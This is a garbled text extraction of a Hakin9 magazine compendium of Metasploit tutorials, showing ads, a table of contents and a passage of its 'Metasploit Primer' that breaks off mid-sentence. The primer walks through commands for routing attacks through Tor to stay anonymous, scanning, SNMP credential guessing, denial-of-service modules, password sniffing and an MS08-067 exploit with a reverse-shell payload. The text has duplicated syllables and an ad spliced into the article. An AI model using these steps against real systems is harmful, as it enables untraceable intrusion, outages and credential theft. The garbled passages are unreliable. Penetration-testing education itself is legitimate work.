Certified ISO27005 Risk Manager
Learn the Best Practices in Information
Security Risk Management with ISO
27005 and become Certified ISO 27005
Risk Manager with this 3-day training!
CompTIA Cloud Essentials
Professional
This 2-day Cloud Computing in-company
training will qualify you for the
vendor-neutral international CompTIA Cloud
Essentials Professional (CEP) certificate.
Cloud Security (CCSK)
2-day training preparing you for the
Certificate of Cloud Security Knowledge
(CCSK), the industry’s first
vendor-inde-pendent cloud security certification from
the Cloud Security Alliance (CSA).
e-Security
Learn in 9 lessons how to create and
implement a best-practice e-security
policy!
IT Security Courses and Trainings
IMF Academy is specialised in providing business information by means of distance
learning courses and trainings. Below you find an overview of our IT security
courses and trainings.
IMF Academy
[email protected]
For more information or to request the brochure
please visit our website:
http://www.imfacademy.com/partner/hakin9
Information Security Management
Improve every aspect of your information
security!
SABSA Foundation
The 5-day SABSA Foundation training
provides a thorough coverage of the
knowlegde required for the SABSA
Foundation level certificate.
SABSA Advanced
The SABSA Advanced trainings will
qualify you for the SABSA Practitioner
certificate in Risk Assurance &
Govern-ance, Service Excellence and/or
Architec-tural Design. You will be awarded with
the title SABSA Chartered Practitioner
(SCP).
TOGAF 9 and ArchiMate Foundation
After completing this absolutely unique
distance learning course and passing
the necessary exams, you will receive
the TOGAF 9 Foundation (Level 1) and
ArchiMate Foundation certificate.
AnDevCon™is a trademark of BZ Media LLC. Android™is a trademark of Google Inc. Google’s Android Robot is used under terms of the Creative Commons 3.0 Attribution License.
BOSTON
•
May 28-31,2013
The Westin Boston Waterfront
Follow us: twitter.com/AnDevCon A BZ MediaEvent
Register NOW at www.AnDevCon.com
Get the best real-world Android
developer training anywhere!
• Choose from more than 75 classes
and tutorials
• Network with speakers and other
Android developers
• Check out more than
40 exhibiting companies
“AnDevCon is one of the best networking and information hubs available to Android developers.”
TOOLS
01/2013 (1)
team
Editor in Chief: Krzysztof SamborskiEditorial Advisory Board: John Webb, Marco Hermans,
Gareth Watters
Proofreaders: Jeff Smith, Krzysztof Samborski
Special thanks to our Beta testers and Proofreaders who helped us with this issue. Our magazine would not exist without your assistance and expertise.
Publisher: Paweł Marciniak CEO: Ewa Dudzic
Production Director: Andrzej Kuca
Art. Director: Ireneusz Pogroszewski
DTP: Ireneusz Pogroszewski
Marketing Director: Krzysztof Samborski
Publisher: Software Press sp. z o.o. SK
02-682 Warszawa, ul. Bokserska 1 Phone: 1 917 338 3631
www.hakin9.org/en
Whilst every effort has been made to ensure the highest quality of the magazine, the editors make no warranty, expressed or implied, concerning the results of the content’s usage. All trademarks presented in the magazine were used for informative purposes only.
DISCLAIMER!
The techniques described in our magazine may be used in private, local networks only. The editors hold no responsibility for the misuse of the techniques presented or any data loss.
Dear Readers,
You are going to read Metasploit Tutorials – Hakin9 Compendium. This compendium consists of the articles we collected through a couple of years plus the ones that are still fresh, waiting to be published for the first time. We hope that Metasploit, so often quoted and asked for in your messages to [email protected], becomes even more comprehensible for you after reading this issue.
We grouped the articles published in the issue into the-matic sections. These are: A GUIDE TO METASPLOIT in which you can read about the basics of Metasploit, EXPLOITING WITH METASPLOIT where everybody can find useful tips about the usage of Metasploit, and TOOLS that consists of the articles on various tools and techniques boosting Metasploit.
We hope that these tutorials come in handy.
Regards,
Krzysztof Samborski Product Manager of Hakin9 Magazine
A GUIDE TO METASPLOIT
Metasploit Primer
BY GEORGE KARPOUZAS
Metasploit is an entire framework that provides the nec-essary tools to identify flaws and run various exploits against a remote target machine a penetration test. It simplifies network discovery and vulnerability verifica-tion, increasing the probability of success for your proj-ect. Today we will learn the basics of it.
Metasploit: An Introduction
BY MANASDEEP
Metasploit greatest advantage is that it is open source and freely extendable. You can customize it by includ-ing your exploit and payloads as per your need. A secu-rity pentester can check the custom made applications specific to an enterprise against his customized exploits and payloads. If a security researcher crafts a new at-tack, then a custom made payload can carry out most of the attack purpose.
Cyber Attack Management with
Metasploit
BY JOHN ‘JAY’ TRINCKES, JR
Armitage is a GUI interface for the Metasploit frame-work. The Metasploit Framework is a free, open source penetration testing solution. In the article John de-scribes how to use Metasploit.
Cyber Attack Management with
Armitage
BY ABHINAV SINGH
Metasploit has now become the industry standard prod-uct for penetration testing. Armitage leverages the func-tionality of Metasploit and provides a complete graphi-cal interface to it. The article describes how to set up a penetration testing scenario using Armitage.
How to Use Metasploit for Security
Defense
BY JUSTIN C. KLEIN KEANE
If you’ve ever taken any training about penetration testing, or read almost any book or online article about the trade, you’ve heard of Metasploit. Years ago, be-fore penetration testing was a recognized profes-sional field, exploiting a vulnerability was often an
ex-tremely onerous task. Identifying a vulnerability might be as easy as fingerprinting a system then searching public mailing lists, but finding exploit code was often difficult.
My Experiences with the Metasploit
Framework: From N00b to Contributor
BY JOSHUA SMITH
Ever wanted a tour of the Metasploit Framework (MSF)? If you have basic command line skills, and a working knowledge of networking and how host are compromised, you can take a guide tour from some-one who started as a tourist and ended up as a tour guide. You will see how you can use MSF for all sorts of tasks and learn to write your own magic for yourself or to share.
EXPLOITING WITH
METASPLOIT
How to Penetrate with Metasploit? A
Step-by-step Basic Pentesting Guide
BY ABDY MARTÍNEZ
Cybercriminals are knocking at doors, so we need to be prepared to protect our systems from them. The big question is how I am going to do this, if I don’t know my system vulnerabilities. Pentesting is the answer. Now, how do I perform a cheap/free but powerful pentest in my system? Here is where Metasploit Community ap-pears.
How To Exploit Windows 8 With
Metasploit
BY AHMED SHERIF
In this article we’re going to learn how to exploit (Win-dows 8 Preview Build 8400) with client-side attack technique, we’ll get meterpreter session on windows 8 machine. For guys who don’t know what is metasploit project.
How to Use Metasploit with Backtrack
BY VAHID SHOHOUHI
In this short tutorial of BackTrack, we will get to know an exploiting framework called Metasploit; which was cre-ated by great HD Moore. Metasploit itself has a stand-alone version, “Metasploit Framework” which is used by pros. BackTrack includes Metasploit too, but it doesn’t
08
20
40
56
60
64
26
28
34
CONTENTS
get updated with new modules, e.g. “Exploit Module”. At first we go through basic, yet main, definitions and parts inside of Metasploit. Our amigo has lots of features that could not be covered completely here; So we focus on the two big brothers: Payload & Meterpreter. Then we will practice one trick or two.
The Inside-Outsider – Leveraging Web
Application Vulnerabilities + Metasploit
to become the Ultimate Insider
BY ABHAY BHARGAV
An effective penetration test is one that has a specific objective. Typically, the objective is to identify and ex-ploit as many vulnerabilities as can be found, within the scope of the rules of engagement. However, my inter-pretation of ‘objective’ is a little different. For me, be-ing objective is really about whether I, as a penetration tester, can gain access to information assets that the organization considers critical. This means that whilst I might uncover several vulnerabilities during the course of a penetration test, but if am unable to gain access to critical information assets of the organization, the fun-damental objective is still not met.
Metasploit Fu Post Exploitation
BY HARSIMRAN WALIA
People always emphasize on breaking into the sys-tem or the exploitation part. We are into a syssys-tem, what should be the done further? Post exploitation is rarely talked about which is as important as getting in. This ar-ticle will mostly focus on some necessities and possibili-ties post exploitation of a system.
How to Use Metasploit for Penetration
Testing
BY ANKHORUS CYBER SECURITY
When we say “Penetration Testing tool” the first thing that comes to our mind is the world’s largest Ruby project, initially started by HD Moore in 2003 called ‘Metasploit ‘ a sub-project of Metasploit Project. Other important sub-projects include the Opcode Database, shell code archive, and security research. It was creat-ed in 2003 in the Perl programming language, but due to some Perl disadvantages was completely re-written in the Ruby Programming Language in 2005. On Oc-tober 21, 2009, Rapid7, a vulnerability management solution company, acquired the Metasploit Project.
A collaboration between the open source community and Rapid7, Metasploit software helps security and IT professionals identify security issues, verify vul-nerability mitigations, and manage expert-driven se-curity assessments, providing true sese-curity risk in-telligence. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering.
How to Scan with Nessus from within
Metasploit
BY MICHAEL BOMAN
When you perform a penetation test with Metasploit you sometimes import vulnerability scanning results from example Nessus Vulnerability Scanner. Usually you start the scan externally from metasploit framework and then import the results into metasploit. What you can do is to manage the Nessus scan from within Metasploit and easily import the results into your process. But let’s start from the beginning.
How to Use Multiplayer Metasploit with
Armitage
BY MICHAEL BOMAN
Metasploit is a very cool tool to use in your penetra-tion testing: add Armitage for a really good time. Pen-etration test engagements are more and more often a collaborative effort with teams of talented security practitioners rather than a solo effort. Armitage is a scriptable red team (that is what the offensive security teams are called) collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the frame-work.
TOOLS
Advance Meterpreter with API,
Mixins and Railgun
BY ABHINAV SINGH
Meterpreter is considered the heart of metasploit – it provides a wide range of features that can be performed during post exploitation. The main role of meterpreter is to make our penetration task easier and faster. In this tutorial we will talk about some of the advanced con-cepts related to meterpreter. We will dive deeper into the core of metasploit to understand how meterpreter scripts function and how we can build our own scripts.
68
90
94
112
74
84
CONTENTS
Vmware vSphere Security and
Metasploit Exploitation Framework
BY DUANE ANDERSON
Vmware vSphere is another layer in your overall envi-ronment to attack. In this article you will learn some of the threats, how to mitigate them and how to attack that virtual layer.
Metasploit – How to Play with Smb
and Authentication
BY GUGLIELMO SCAIOLA
In my experience a lot of infrastructures have two big problems, they are using local admin credential with the same password in some or all systems of the network and maintain some servers (or clients) unpatched, with these two common mistakes we can completely Pown the infrastructure.
Two pillars of best practices are just patching and a dif-ferent password for local admin for each host and it is possible to retrieve a lot of best practices from the Inter-net and in many books about security architecture, but a lot of system admin don’t use them, why?
In most case because the system admins are unedu-cated in security, or because they are lazy, or because they are too busy.
How to Bend Metasploit to Your Will
BY PATRICK FITZGERALD
Most articles on Metasploit cover what it is, what it does and how to use it. Essentially you can find out how to scan for vulnerable systems followed by how to select, configure and deploy an exploit against a vulnerable system. These are indispensable skills to anyone who wishes to use the framework in any capacity. The pur-pose of this article is to give those interested an insight into how to extend Metasploit to suit their own specific needs. This extensibility is where Metasploit is leagues ahead of the competing frameworks currently available.
How to Work with Metasploit Auxiliary
Modules
BY ABHINAV SINGH
The Metasploit framework is based on a modular ar-chitecture. This means that all the exploits, payloads, encoders etc are present in the form of modules. The biggest advantage of a modular architecture is that it is easier to extend the functionality of the framework
based on requirement. Any programmer can develop his own module and port it easily into the framework.
How to use Sqlploit
BY GEORGE KARPOUZAS
Databases nowdays are everywhere, from the small-est desktop applications to the largsmall-est web sites such as Facebook. Critical business information are stored in database servers that are often poorly secured. Some-one with access to this information could have control over a company’s or an organization’s infrastructure.
How to Explore the IPv6 Attack
Surface with Metasploit
BY MIKE SHEWARD
IPv6 is often described as a parallel universe, co-ex-isting alongside exco-ex-isting IPv4 infrastructure in a bid to ease the transition process. Often left unmanaged and unmonitored in networks, those IPv6 packets could pro-vide a great opportunity for the savvy attacker. Thanks to the Metasploit framework, exploring the IPv6 attack surface has become a lot easier.
HAKIN9 EXTRA
How to Use The Mac OS X Hackers
Toolbox
BY PHILLIP WYLIE
When you think of an operating system to run pen test-ing tools on, you probably think of Linux and more spe-cifically BackTrack Linux. BackTrack Linux is a great option and one of the most common platforms for run-ning pen testing tools. If you are a Mac user, then you would most likely run a virtual machine of BackTrack Linux. While this a great option, sometimes it is nice to have your tools running on the native operating system of you computer.
116
156
166
174
128
134
144
CONTENTS
A GUIDE TO METASPLOIT
Metasploit Primer
Metasploit is an entire framework that provides the necessary tools
to identify flaws and run various exploits against a remote target
machine during a penetration test. It simplifies network discovery
and vulnerability verification, increasing the probability of success
for your project. Today we will learn the basics of it.
M
etasploit is one of the most popular tools in the field of information security and penetration testing. It includes fuzzing tools and not just exploits, so it can be used to discover software vulnerabilities. Metasploit has changed the way we perform penetration tests and has become the de facto framework for find-ing and exploitfind-ing application vulnerabilities. It is available for all popular operating systems and this has played an important role in the popu-larity of this great framework. Metasploit is not just a toolbox full of exploits. It contains various modules such as service scanners, port scan-ners, fuzzers and numerous post exploitation modules.Anonymity First
Tor protects your anonymity by bouncing your communications around a distributed network of relays, run by volunteers all around the world. The primary purpose of Tor is to protect commu-nications and improve privacy and security on the Internet. To remain anonymous we should launch our attacks through the TOR network using the Socat program. Socat is a command line utility that establishes two bidirectional byte streams and transfers data between them. Let us as-sume that the IP address of our target machine is 192.168.1.5. We run Socat in this way: TCP4-LISTEN:3333, fork SOCKS4a:127.0.0.1:192.168. 1.5:80,socksport=9050.
The above command sets up a local Socat proxy listening on port 3333. Socat will forward all TCP traffic for 192.168.1.5:80 via the SOCKS TOR proxy that is listening on 127.0.0.1 on port 9050.
Launch attacks via Tor
Now, to launch your attacks via Tor and So-cat and exploit your target machine at IP ad-dress 192.168.1.5, you have to set the target IP to 127.0.0.1 (RHOSTS) and remote port to 3333 (RPORT).
Port Scanning
Nmap
Nmap is a free and open source tool for network discovery and security auditing. Nmap is able to determine what hosts are available on the network, what operating systems and services are running on the target hosts, and can identify the type of the firewalls that are in use along with dozens of other capabilities.
Import Nmap results into Metasploit
It is very helpful to scan your target with Nmap and import the results into Metasploit. All you have to do is scan your target using the -oX op-tion to generate an xml file that will contain the results. To do this, execute the following nmap command, assuming that your target machine has the IP address 192.168.1.5, nmap -Pn -sS -A -oX scan.xml 192.168.1.5. Launch the
msf-console, if you have not done it already, and im-port the results with this command, import scan. xml. To verify that the import was successful,
use the hosts command to list all targeted hosts (Figure 1).
Run Nmap from msfconsole
You can also run Nmap from within msfconsole and have the results automatically stored into da-tabase. To achieve this, run db_nmap -Pn -sS -A 192.168.1.5, assuming that your target machine’s
IP address is 192.168.1.5. To verify that the results
use auxiliary/scanner/ portscan/tcp and type show
options to see a list of avail-able options. To set the tar-get machine, execute set RHOSTS ip_address where
ip_address is the IP address of your target machine. You can also increase threads for a faster port scanning. Set threads to 50 and run the scanner module by issu-ing the command run.
Idle Scanning with Nmap
and Metasploit
Idle Scanning allows blind port scanning. We can scan a target without sending packets to the target from our own IP address while spoofing the IP address of another host on the network. Idle scanning allows us to be stealthy and allows us to discover IP-based trust relationships between ma-chines. To achieve this type of scan we will need to lo-cate a host that is idle on the network. Metasploit con-tains the module scanner/ ip/ipidseq to scan for an
idle host on the network. Let us run scanner/ip/ipidseq module to discover an idle
host on the net. Type: • use auxiliary/scanner/ip/
ipidseq
• set RHOSTS 192.168. 238.0/24
Figure 3. Available port scanners in MSF 4.4.0 Figure 2. Services command result
Figure 1. Hosts command result
from the scan have been stored in database, run
hosts or services (Figure 2).
Port scanning with Metasploit auxiliary
Although Nmap is the de-facto port scanner and has become a synonym to port scanning, Metasploit offers its own port scanners. These port scanners are available in auxiliary mod-ules. In msfconsole execute search portscan to
see a list of all available port scanners in MSF (Figure 3).
To select one of the available port scanners, let us say tcp scanner, execute
A GUIDE TO METASPLOIT
• set THREADS 50 • run (Figure 4)
To scan host 192.168.1.100 for example using zombie pc at 192.168.1.200, we use nmap: nmap -PN -sI 192.168.238.200 192.168.238.100.
OS Fingerprinting with Metasploit
OS fingerprinting is the process of determining the operating system running on a host. Port 445 is used by SMB protocol for providing shared access to files, printers, serial ports, and miscellaneous communications between nodes on a network. Most usage of SMB involves computers running Microsoft Windows. To check if port 445 is open use auxiliary/scanner/portscan/syn, set RHOSTS 192.168.1.5 and set PORTS 445 and run the
mod-ule.
smb_version module
If port 445 is open then we are going to use smb_ver-sion module. Type use scanner/smb/smb_version
and set RHOSTS 192.168.1.5, assuming that your
target machine has IP address 192.168.1.5. Type run and hit enter to get your results:
msf auxiliary(smb_version) > run
[*] 192.168.1.5:445 is running Windows XP Service Pack 2 (language: English) (name:JOHN) (domain: MYDOMAIN)
[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Voila! A Windows XP SP2 machine with lots of vulnerabilities. Execute the command hosts again to see that Metasploit has updated the database according to our new discovery.
Working with Scanners
Metasploit provides us with many scanning mod-ules. To list the available scanners from within ms-fconsole, type info auxiliary/scanner/ or search scanner, and hit tab to discover that MSF has over
240 scanners available.
HTTP Scanning
There are many http scanners available in Metasploit. We are going to use the http_version scanner. Select it, use auxiliary/scanner/http/ http_version. Type show options for a list of
avail-able options.
msf auxiliary(http_version) > show options
Module options (auxiliary/scanner/http/http _ version): Listing 1.
Select your target host, set RHOSTS target_ host_ip and run the module.
Microsoft SQL Server Discovery
To see a list of all modules relative to MS SQL, issue the command search mssql. Choose
ms-sql_ping module, use auxiliary/scanner/mssql/ mssql_ping. To scan the whole network set
RHOSTS 192.168.1.0/24, set THREADS 255 and run the module. Sit back and let Metasploit discover all MS SQL servers on the network.
MySQL Discovery
To find all MySQL auxilia-ry modules issue the com-mand search mysql. Choose mysql_version module, use auxiliary/scanner/ mysql/mysql_version. To
scan the whole network set RHOSTS 192.168.1.0/24, set THREADS 50 and run
the module. Sit back and let Metasploit discover all of the MySQL servers and their versions!
FTP Scanning
FTP is an insecure proto-col. FTP servers are one
www.cybersecurityuae.com Conference & Exhibition
Assess the nature of the latest threats being faced and the impact of these upon your organisation Discuss the most promising cyber security technologies in the marketplace
Assess the trends to watch in global cyber security International Case Studies: Discover the best practice in protecting your organisation from cyber-attack Network with your industry peers in
the comfort of a 5 star venue
The only event of its kind to take place in the Middle East
Developments, Strategies and Best Practice
in Global Cyber Security
CYBER SECURITY UAE
SUMMIT 2013
May 13th & 14th, Dubai
Special
focus on the
Banking, Oil & Gas
& Government
Sectors
Protecting critical infrastructures Main Sectors Covered:
2nd Annual
CYBER SECURITY
UAE TECH 2013
Hurry exhibition space for the 30 booth exhibition is expected to sell out.
For further details on exhibiting place email
[email protected] 8 9 10 11 12 7 6 5 4 3 2 1 13 14 15 16 17 18 19 N E T W O R K IN G A RE A N E T W O R K IN G A RE A 21 22 23 24 25 26 27 28 29 30 20
Electricity & Water
Oil & Gas
Financial Services
Transportation
Government
Defense
Make valuable connections at the networking evening GOLD SPONSOR SILVER SPONSOR MEDIA PARTNERSThe only
event of its
kind
to take plac
e
in the UAE
Featuring 30 top level speakers!
TARIQ AL HAWI, Director, AE CERT
BADER AL-MANTHARI, Executive Information Security, ITA OMAN
OMAR ALSUHAIBANU, Network Security Engineer,
CERT SAUDI ARABIA
AHMED BAIG, Head, Information Security and Compliance,
UAE GOVERNMENT ENTITY
TAMER MOHAMED HASSAN, Information Security Specialist, UAE GOVERNMENT ENTITY
AMANI ALJASSMI, Head of Information Security Section,
DUBAI MUNICIPALITY
NAVEED AHMED, Head of IT Security, DUBAI CUSTOMS
RIEMER BROUWER,Head of IT Security, ADCO
AYMAN AL-ISSA, Digital Oil Fields Cyber Security Advisor, ABU DHABI MARINE OPERATING COMPANY
MOSTA AL AMER, Information security Engineer,
SAUDI ARAMCO.
HESHAM NOURI,IT Manager,
KUWAIT OIL COMPANY
KENAN BEGOVIC, Head of Information Security,
AL HILAL BANK
USAMA ABDELHAMID Director, UBS
ABEER KHEDR, Director of Information Security,
NATIONAL BANK OF EGYPT
BIJU NAIR, Head of Audit,
NOOR ISLAMIC BANK
BHARAT RAIGANGAR, Director, Corporate Security Advisor,
ROYAL BANK OF SCOTLAND
ASHRAF SHOKRY, Chief Information Officer,
AJMAN BANK
MOHAMED ROUSHDY, Chief Information Officer, NIZWA BANK
ZAFAR MIR Regional Manager
HSBC BANK MIDDLE EAST
MAHMOUD YASSIN Lead Security & System Eng Manager,
NATIONAL BANK OF ABU DHABI
HUSSAIN ALKHASAN, IT GRC Manager, COMMERCIAL BANK OF DUBAI (UAE)
FURQAN AHMED HASHMI, (PMP, CISSP, CCIE, TOGAF) Architect, EMIRATES INVESTMENT AUTHORITY
STEVE HAILEY, President CEO,
CYBER SECURITY INSTITUTE
OMER SYED, Project Manager,
ROADS & TRANSPORT AUTHORITY
BIJU HAMEED, ICT Security Manager, DUBAI AIRPORTS
MOHAMMED AL LAWATI, ICT policy and Procedure Advisor, OMAN AIRPORTS MANAGEMENT COMPANY
MURTAZA MERCHANT, Senior Security Analyst,
EMIRATES AIRLINE
AMR GABER, Senior Network Security Engineer, DUBAI STATISTICS CENTRE
ANDREW JONES, Chairman of Information Security,
KHALIFA UNIVERSITY
NASIR MEMO, Principal Investigator, NEW YORK UNIVERSITY
A GUIDE TO METASPLOIT
of the easiest ways to get into a target network. Always check to see if anonymous access is al-lowed whenever you encounter an open FTP port. To check for anonymous access, issue the com-mand use auxiliary/scanner/ftp/anonymous, set
the options appropriately and run the module. To identify the ftp version, there is a suitable module called ftp_version. Type use auxiliary/scanner/ ftp/ftp_version to use it.
SSH Scanning
SSH is a very secure protocol although there are vulnerabilities in various implementations and you should determine which version is running on the target. You can use the ssh_version module to de-termine the SSH version running on the target serv-er. To choose ssh_version module, use auxiliary/ scanner/ssh/ssh_version and Set RHOSTS and THREADS accordingly.
SNMP Enumeration and Login
SNMP is typically used with network devices to re-port information. As a result, there is a chance to find information about a specific system by enu-merating the SNMP port. If you can find a Cisco device running and can get the read/write SNMP community string, you can actually download the entire device configuration, modify it, and upload your own malicious configuration back to the de-vice.
Metasploit comes with a built in auxiliary mod-ule specifically for sweeping SNMP devices. If it
is possible to guess the community strings, SNMP can allow from excessive information disclosure to full system compromise. To gain access to a switch, we have to guess its community strings. Execute the command use auxiliary/scanner/ snmp/snmp_login, set rhosts to target machine’s ip
address and run the module. Other SNMP auxil-iary modules are: Figure 5.
VNC Scanner
Virtual Network Computing (VNC) is a graphical
desktop sharing system that uses the RFB proto-col to remotely control another computer. It trans-mits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in the other direction across a net-work. Imagine what control over the compromised machine you will have if you manage to find a VNC server with a default configuration or with no pass-word at all. The VNC Authentication None Scanner scans an IP address or a range of IP addresses looking for targets that are running a VNC server without a password configured. To use vnc scan-ner execute use auxiliary/scanner/vnc/vnc_ none_auth, set rhosts to an IP range (for example
192.168.1.0/24) and run the module. Do not forget to increase the number of the threads if you are scanning more than one target.
Open_X11 Scanner
The X window system is a software system and network protocol that provides a basis for
graphi-Figure 5. SNMP auxiliary modules in MSF 4.4.0
Listing 1. Module options (auxiliary/scanner/http/http _ version)
Name Current Setting Required Description ---- ---- --- Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier RPORT 80 yes The target port
THREADS 1 yes The number of concurrent threads VHOST no HTTP server virtual host
cal user interfaces and rich input device capability for networked computers. Like VNC, if you find a host with X11 enabled with default configuration, you will control the host completely. The open_x11 scanner module scans a target or multiple targets for X11 servers that will allow a user to connect without any authentication. To use the module, se-lect the auxiliary module (auxiliary/scanner/x11/ open_x11), define your options and run it.
Host Discovery
Host discovery is the process of identifying live hosts on a network. A live host is any host that re-sponds to a ping or has open ports.
ARP Scanning
ARP (Address Resolution Protocol) is a protocol used for the resolution of network layer address-es into link layer addraddress-essaddress-es. The ARP protocol is designed to be used for any link layer and net-work layer protocols. ARP is a non-routable pro-tocol and can only be used between systems on the same Ethernet network. We can use scanner module arp_sweep to discover and fingerprint IP hosts on the local network. To use it type, use
auxiliary/scanner/discovery/arp_sweep.
Se-lect the whole local network to scan, for ex. set RHOSTS 192.168.1.0/24 and run the module
(Fig-ure 6).
UDP Probe
With the User Datagram Protocol (UDP) can send messages or datagrams to other hosts on an Internet Protocol (IP) network. There is no guarantee of delivery, ordering or duplicate pro-tection. UDP is suitable for purposes where er-ror checking and correction is either not neces-sary or is performed in the application, avoiding the overhead of such processing at the network interface level. UDP is one of the most famous network protocols and it is widely used. Let us see how we can probe known UDP ports to dis-cover live hosts on the network. Metasploit of-fers module udp_probe to discover live hosts on the network by scanning an IP or a range of IPs for open UDP ports. To select it, type use auxiliary/scanner/discovery/udp_probe. Set
RHOSTS option and run the module to get a list of live hosts (Figure 7).
Denial of Service Attacks
A denial-of-service attack (DoS) is an attempt to make a machine or network re-source unavailable to its in-tended users.
Apache HTTP Server
Apache httpd has been the most popular web server on the Internet since April 1996. It consists of a thou-sand of lines of code and a vast variety of modules and extensions. Therefore, vulnerabilities could not be missing. The Apache ex-tension mod_isapi imple-ments the Internet Server extension API. It allows In-ternet Server extensions to be served by Apache for Windows. Metasploit mod-ule apache_mod_isapi trig-gers a vulnerability in the Apache mod_isapi exten-sion. In order to trigger this vulnerability, the target serv-er must have an ISAPI mod-ule installed and configured.
Figure 7. udp_probe module results Figure 6. arp_sweep module result
A GUIDE TO METASPLOIT
By making a request that terminates abnormally, mod_isapi will unload the ISAPI extension. Later, if another request comes for that ISAPI module, pre-viously obtained pointers will be used resulting in an access violation or potential arbitrary code ex-ecution. To use this module type, use auxiliary/ dos/http/apache_mod_isapi. Type show options to
view a list of available options. After you have set the options, run the module (Figure 8).
FileZilla FTP Server
FileZilla is an open source FTP client and serv-er software, distributed free of charge undserv-er the terms of the GNU General Public License. It is very popular software. Under Windows, FileZilla is com-monly used as a server. Metasploit is offering two auxiliary modules to perform DoS attacks against Windows with FileZilla Server installed.
filezilla_admin_user
This module triggers a Denial of Service condition in the FileZilla FTP Server Administration Interface in versions 0.9.4d and earlier. To select it type use auxiliary/dos/windows/ftp/filezilla_admin_user. filezilla_server_port
This module triggers a Denial of Service condition in the FileZilla FTP Server versions 0.9.21 and ear-lier. To select it type use auxiliary/dos/windows/ ftp/filezilla_server_port.
Password sniffing
A packet sniffer is a computer program that inter-cepts and logs traffic passing over a network. The sniffer captures each packet, decodes the pack-et’s raw data, showing the values of various fields in the packet, and analyzes its content. If network
communications are not encrypted, it is possible to intercept communications and capture passwords that are transmitted in plain text.
psnuffle
Metasploit has a password sniffing module named ‘psnuffle’ that can be used to sniff passwords off the wire similar to the tool dsniff. It currently supports pop3, imap, ftp, and HTTP GET. Using the ‘psnuf-fle’ module is extremely simple. Just select it and run it. To select psnuffle execute, use auxiliary/ sniffer/psnuffle. There are some options
avail-able. You can specify the filter string for capturing traffic, the name of the interface, the name of the PCAP capture file to process, a comma-delimited list of protocols, the number of bytes to capture and the number of seconds to wait for new data (Figure 9).
Vulnerability Scanning
A vulnerability scanner is an automated computer program designed to assess computers, networks or applications to look for weaknesses. The pro-gram probes a system by sending data to it and analyzing the responses received. To identify any vulnerabilities on the target system, a vulnerability scanner uses its vulnerability database as a refer-ence. Do not forget that vulnerability scanners cre-ate a lot of traffic on a network and are not suitable if one of your objectives is to remain undetected.
WMAP – Web Vulnerability Scanner
WMAP is a web vulnerability scanner and is inte-grated with Metasploit. First of all, we have to load the wmap plugin by issuing the command: load wmap. To perform your web scan follow these steps:
• Add a new tar-get url, wmap _ sites -a http://192.168.1.5
• Add the site as a tar-get, wmap _ targets -t http://192.168.1.5
• List the modules that will be used to scan the re-mote system, wmap _ run -t
• Scan the target system,
wmap _ run -e
• Check to see if WMAP found anything interesting execute hosts -c address, svcs, vulns
• If WMAP found any vul-nerabilities issue the command
vulns to get more details
Figure 9. psnuffle sniffing traffic Figure 8. apache_mod_isapi options
Nexpose vulnerability Scanner
To import a Nexpose vulnerability scan report, you have to import the Nexpose xml file into the MSF database. To import xml file, enter import fol-lowed by the report filename. For example, import /root/my_nexpose_scan.xml. To verify that the
scanned host and vulnerability data was imported properly, enter hosts -c address, svcs, vulns to
verify. Enter vulns to view the details of the
discov-ered vulnerabilities (Figure 10).
Nexpose plugin
There is a Nexpose plugin for Metasploit to run Nexpose from msfconsole. To perform a vulnera-bility scan within Nexpose you have to:
• Load Nexpose plugin, load nexpose
• If you need help enter help
• Connect to your NeXpose server nexpose _ connect username:[email protected][:port]
• Launch a new scan with nexpose_scan fol-lowed by the the target IP address, for ex.
nexpose _ scan 192.168.1.5
• Enter hosts -c address, svcs, vulns to view
the results
• Execute vulns to view details for the
discov-ered vulnerabilities
Nessus Vulnerability Scanner
To import a Nessus vulnerability scan report, you have to download it first by selecting your report and hitting download. Download the report in .nes-sus format. To import the Nes.nes-sus results file,
en-ter import followed by the report filename. For ex-ample, import /root/nessus_report_ftp_target. nessus. To verify that the scanned hosts and
vul-nerability data was imported properly, enter hosts -c address,svcs,vulns to see if the target IP
ad-dresses, detected services, and vulnerabilities de-tected by Nessus are in the list. Like we did with WMAP, enter vulns to view details for the discov-ered vulnerabilities.
Nessus Plugin
There is also a Nessus plugin for Metasploit to con-trol Nessus through the Metasploit framework. To perform a vulnerability scan using Nessus from with-in Metasploit, follow these steps:
• Load Nessus plugin, load nessus
• If you need help enter nessus _ help
• Authenticate to your Nessus server nessus _ connect username:[email protected]:8834
• List available scan policies by issuing,
nessus _ policy _ list
• Launch a new scan with nessus_scan_ new followed by the policy number, a name for your scan, and your target IP address, for ex. nessus _ scan _ new 1 scan _ target 192.168.1.5
• Check scan status while it is running enter
nessus _ scan _ status
• List the available scan reports after the scan has completed, execute nessus _ report _ list
command, identify the ID of the report you want to import and enter nessus_report_get to download the report and import it into the Metasploit database automatically. for ex nessus _ report _ get 1d890f6b-be0d-1e8f-ea6f-fca1ea1402ef9563fbf0283 05b22 (Figure 11)
Exploitation
If a vulnerable host has been identified it is time for the real deal. The Metasploit Framework contains hun-dreds of exploits. Running
show exploits from
msfcon-sole will display every exploit available in the Framework. Other valid parameters for the “show” command are all, encoders, nops, exploits, payloads, auxiliary, plugins and options.
Figure 10. nexpose help menu
A GUIDE TO METASPLOIT
Exploiting the Target
We are going to attack a Windows XP SP2 ma-chine with exploit MS08-067. To discover if the tar-get machine is vulnerable to this exploit, we are going to use Nmap and script smb-check-vulns. Fire up your msfconsole and execute nmap -sS -A --script=smb-check-vulns -P0 192.168.1.5.
If your target machine is vulnerable, search for ms08_067_netapi and enable it use windows/ smb/ms08_067_netapi. Now we need to select
our payload. We will use Windows-based Me-terpreter reverse tcp. To select this payload, execute set PAYLOAD windows/meterpreter/ reverse_tcp. To view a list of available
pay-loads for the exploit execute show paypay-loads (Figure 12).
If everything goes well a connection will be cre-ated from the target machine back to your attack-ing machine. Reverse TCP allows us to succeed in compromising the target system in case the target machine is behind a firewall or NAT and when it is impossible to bind TCP. After select-ing the payload we have to specify our target be-cause this exploit is specific to the operating
sys-tem version, service pack and language. Execute show targets to see a list of possible exploit tar-gets (Figure 13).
To select your target execute set TARGET 4 for
example. Set the options and type exploit. When
